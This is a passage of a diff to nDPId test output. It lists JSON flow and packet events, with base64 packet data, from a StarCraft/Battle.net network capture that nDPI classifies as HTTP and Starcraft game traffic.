{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981330,"flow_last_seen":1437389981330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981330,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1437389981330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981330,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RD1AAIAG6XXAqAFkUO+6FQ28AFBBQIDMAAAAAIACIACx5gAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1437389981385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981385,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDbzhin+3QUCAzWASOQhgoQAAAgQFtAAA"} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1437389981385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981385,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRD9AAIAG6X\/AqAFkUO+6FQ28AFBBQIDN4Yp\/uFAQ+vC2dQAA"} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982130,"flow_last_seen":1437389982130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982130,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1437389982130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982130,"pkt":"hCYVPnXEIImEa8W6CABFAAA0Zr9AAIAGfH3AqAFk1fh\/gg29BF8F03V0AAAAAIACgABKLQAAAgQFtAEDAwABAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982140,"flow_last_seen":1437389982140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982140,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1437389982140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982140,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EY9AAIAGHB\/AqAFkUO+6Gg2+AFAFq5RDAAAAAIACIADZ\/QAAAgQFtAEDAwgBAQQC"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1437389982182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982182,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADIGMUXV+H+CwKgBZARfDb3bZ8BEBdN1dWASFtBArgAAAgQFtAAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1437389982183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982183,"pkt":"hCYVPnXEIImEa8W6CABFAAAoZsBAAIAGfIjAqAFk1fh\/gg29BF8F03V122fARVAQgADvOgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1437389982197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982197,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDb7iEHr2BauURGASOQiM8wAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1437389982197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982197,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZBAAIAGHCrAqAFkUO+6Gg2+AFAFq5RE4hB691AQ+vDixwAA"} 
+00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982269,"flow_last_seen":1437389982269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982269,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1437389982269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982269,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RElAAIAG6WnAqAFkUO+6FQ2\/AFB8c4vnAAAAAIACIABrlQAAAgQFtAEDAwgBAQQC"} 
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1437389982326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982326,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDb8Q\/FwJfHOL6GASOQgOjQAAAgQFtAAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1437389982327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982327,"pkt":"hCYVPnXEIImEa8W6CABFAAAoREtAAIAG6XPAqAFkUO+6FQ2\/AFB8c4voEPxcClAQ+vBkYQAA"} 
+00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1437389982769,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":1437389982769,"pkt":"hCYVPnXEIImEa8W6CABFAAAeGS0AAIARpdHAqAFkBSq0ms+aBF8ACqcOCQE="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -165,153 +165,153 @@ 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982884,"flow_last_seen":1437389982884,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1437389982884,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1437389982884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":43,"pkt_l4_len":9,"thread_ts_msec":1437389982884,"pkt":"hCYVPnXEIImEa8W6CABFAAAdDfMAAIARFTLAqAFk1fh\/phfhBF8ACcjwAw=="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1437389982933,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":15,"thread_ts_msec":1437389982933,"pkt":"IImEa8W6hCYVPnXECABFAAAjAABAADMRMB\/V+H+mwKgBZARfF+EAD6SGBF05\/GkEgAAAAAAAAAAAAAAA"} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983663,"flow_last_seen":1437389983663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983663,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1437389983663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983663,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EZpAAIAGHBTAqAFkUO+6Gg3BAFD6MpY\/AAAAAIACIADjdgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983723,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcFck85k+jKWQGASOQjIewAAAgQFtAAA"} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983723,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZtAAIAGHB\/AqAFkUO+6Gg3BAFD6MpZAXJPOZVAQ+vAeUAAA"} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983788,"flow_last_seen":1437389983788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1437389983788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983788,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RFRAAIAG6V7AqAFkUO+6FQ3CAFAtDsyVAAAAAIACIAB6SQAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983846,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDcLXOt3ELQ7MlmASOQjVRgAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983846,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRFZAAIAG6WjAqAFkUO+6FQ3CAFAtDsyW1zrdxVAQ+vArGwAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985308,"flow_last_seen":1437389985308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985308,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1437389985308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985308,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EaZAAIAGHAjAqAFkUO+6Gg3DAFAjjlJ6AAAAAIACIAD93gAAAgQFtAEDAwgBAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985320,"flow_last_seen":1437389985320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985320,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1437389985320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985320,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EadAAIAGHAfAqAFkUO+6Gg3EAFAnGJJ3AAAAAIACIAC6VgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1437389985363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985363,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcNyhhfoI45Se2ASOQiDbQAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1437389985363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985363,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEahAAIAGHBLAqAFkUO+6Gg3DAFAjjlJ7coYX6VAQ+vDZQQAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1437389985376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985376,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcQgMkzhJxiSeGASOQhdQAAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1437389985376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985376,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEapAAIAGHBDAqAFkUO+6Gg3EAFAnGJJ4IDJM4lAQ+vCzFAAA"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
